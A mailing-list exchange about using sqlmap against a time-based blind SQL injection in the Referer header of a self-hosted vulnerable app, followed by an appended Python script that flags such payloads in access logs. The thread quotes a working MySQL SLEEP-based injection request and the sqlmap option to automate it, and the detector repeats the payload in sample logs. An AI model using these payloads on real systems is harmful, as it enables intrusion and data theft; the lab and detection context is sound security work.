Hi Alton.

Please update to the latest revision and run sqlmap with: -p referer.

Kind regards,
Miroslav Stampar

On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alton...@gmail.com> wrote:

> In my situation, my vulnerable parameter is Referer in the HTTP
> headers. I am able to enumerate the username and database name
> manually, but can someone explain or point me to an article that gives
> details about sqlmap and time-based with mysql? Here is an example of
> how I was able to enumerate the name. I'm unsure if there's any
> "custom" way of getting sqlmap to work with this.
>
> Code:
> GET /vulnwebapp/index.php?id=2 HTTP/1.1
> Host: 192.168.127.133
> Proxy-Connection: keep-alive
> User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
>
> FYI, I'm testing this on a vulnerable web app hosted by myself. So
> with the above request, the page sleeps because the first character of
> the current username is "r", which eventually allows me to change 1,1
> to 2,1 and so forth until I figure out that the username is "root."
>
> Is there any way to get sqlmap to assist with this type of attack?
>
> Thanks,
>
>



-- 
Miroslav Stampar
http://about.me/stamparm
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
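
A defensive counterpart to the request quoted in this thread, added here as an example (it is not part of the original messages or of sqlmap): a small log check that flags requests whose Referer header carries a database delay call, including URL-encoded forms. It assumes Apache/nginx "combined" access-log format; the log lines are constructed, and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?:[^"\\]|\\.)*"$'
)
# Delay primitives that time-based blind SQL injection relies on (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b', re.I)

# Constructed sample log (assumption: not taken from the thread's server).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Oct/2012:23:01:02 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "'+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'" "Mozilla/5.0"
192.0.2.10 - - [07/Oct/2012:23:01:09 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "'+IF(SUBSTRING(USER(),2,1)='o',SLEEP(5),1)+'" "Mozilla/5.0"
198.51.100.7 - - [07/Oct/2012:23:02:00 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "http://example.com/blog/how-to-sleep-better" "Mozilla/5.0"
203.0.113.5 - - [07/Oct/2012:23:03:00 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "%27%2BIF%28SUBSTRING%28USER%28%29%2C1%2C1%29%3D%27r%27%2CSLEEP%285%29%2C1%29%2B%27" "Mozilla/5.0"
"""


def flag_referers(log_text):
    """Return (client_ip, raw_referer) for each request whose Referer holds a delay call."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        referer = m.group("referer")
        # Decode percent-escapes first so encoded payloads are matched too.
        if DELAY_RE.search(unquote(referer)):
            hits.append((m.group("ip"), referer))
    return hits


def hits_per_client(hits):
    """Count flagged requests per client; repeated hits suggest character-by-character probing."""
    return Counter(ip for ip, _ in hits)


if __name__ == "__main__":
    for ip, referer in flag_referers(SAMPLE_LOG):
        print(ip, referer)
```

The benign Referer that merely contains the word "sleep" is not flagged, because the pattern requires the call parenthesis.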
